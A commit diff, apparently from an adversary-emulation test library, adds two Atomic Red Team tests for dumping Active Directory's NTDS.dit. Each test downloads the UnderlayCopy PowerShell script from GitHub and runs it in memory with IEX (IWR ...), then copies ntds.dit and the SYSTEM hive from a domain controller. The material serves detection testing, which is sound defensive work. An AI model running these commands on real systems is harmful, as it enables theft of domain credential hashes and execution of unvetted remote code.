Update T1003.003.md & T1003.003.yaml via UnderlayCopy (#3217)
This commit is contained in:
kfallahi
@@ -36,6 +36,10 @@ The following tools and techniques can be used to enumerate the NTDS file and th
|
||||
|
||||
- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
|
||||
|
||||
- [Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing](#atomic-test-10---Copy-NTDS-in-low-level-NTFS-acquisition-via-MFT-parsing)
|
||||
|
||||
- [Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil](#atomic-test-11---Copy-NTDS-in-low-level-NTFS-acquisition-via-fsutil)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -461,8 +465,76 @@ mkdir c:\exfil
|
||||
diskshadow.exe /s #{filename}
|
||||
```
|
||||
|
||||
<br/>
|
||||
|
||||
|
||||
## Atomic Test #10 - Copy NTDS in low level NTFS acquisition via MFT parsing
|
||||
This test is intended to be run on a domain Controller.
|
||||
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
|
||||
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
|
||||
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
|
||||
```
|
||||
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
|
||||
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
|
||||
```
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
|
||||
|
||||
## Atomic Test #11 - Copy NTDS in low level NTFS acquisition via fsutil
|
||||
This test is intended to be run on a domain Controller.
|
||||
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| extract_path | Path for extracted NTDS.dit | path | C:\Windows\Temp|
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (IWR 'https://raw.githubusercontent.com/kfallahi/UnderlayCopy/refs/heads/main/UnderlayCopy.ps1' -UseBasicParsing)
|
||||
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
|
||||
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
|
||||
```
|
||||
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
|
||||
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -261,3 +261,58 @@ atomic_tests:
|
||||
diskshadow.exe /s #{filename}
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Copy NTDS in low level NTFS acquisition via MFT parsing
|
||||
description: |
|
||||
This test is intended to be run on a domain Controller.
|
||||
|
||||
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
extract_path:
|
||||
type: string
|
||||
default: C:\Windows\Temp
|
||||
description: Path for extracted NTDS.dit
|
||||
script_url:
|
||||
description: URL to UnderlayCopy script
|
||||
type: url
|
||||
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
|
||||
executor:
|
||||
command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (IWR #{script_url} -UseBasicParsing)
|
||||
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
|
||||
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
cleanup_command: |
|
||||
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
|
||||
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
|
||||
|
||||
- name: Copy NTDS in low level NTFS acquisition via fsutil
|
||||
description: |
|
||||
This test is intended to be run on a domain Controller.
|
||||
|
||||
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
extract_path:
|
||||
type: string
|
||||
default: C:\Windows\Temp
|
||||
description: Path for extracted NTDS.dit
|
||||
script_url:
|
||||
description: URL to UnderlayCopy script
|
||||
type: url
|
||||
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
|
||||
executor:
|
||||
command: |
|
||||
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
||||
IEX (IWR #{script_url} -UseBasicParsing)
|
||||
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
|
||||
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
cleanup_command: |
|
||||
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
|
||||
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
|
||||
|
||||
Reference in New Issue
Block a user